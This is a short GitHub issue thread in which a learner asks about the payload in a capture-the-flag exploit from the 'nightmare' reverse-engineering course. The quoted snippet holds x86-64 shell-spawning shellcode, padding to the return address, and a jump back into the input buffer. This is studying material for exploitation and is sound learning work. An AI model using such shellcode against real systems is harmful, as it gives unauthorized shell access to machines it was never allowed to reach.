nightmare-2.6-pilot:python exploit code misunderstanding
Closed this issue · 1 comments
Farnaz-1999 commented
Hi,
First Tnx a lot for writing nightmare, this is great and I started learning reverse with it. That`s very useful and complete.
And secondly, I have a problem with the payload in the pilot exploit code:
payload = ""
-> payload += "\x31\xf6\x48\xbf\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdf\xf7\xe6\x04\x3b\x57\x54\x5f\x0f\x05"
payload += "0"*(0x28 - len(payload))
payload += p64(inputAdr)
I can`t understand what I highlighted above.
I would be very grateful if you could describe it to me.
Farnaz-1999 commented
I read more about x86 instructions and my problem almost solved, but more explanation is always helpful.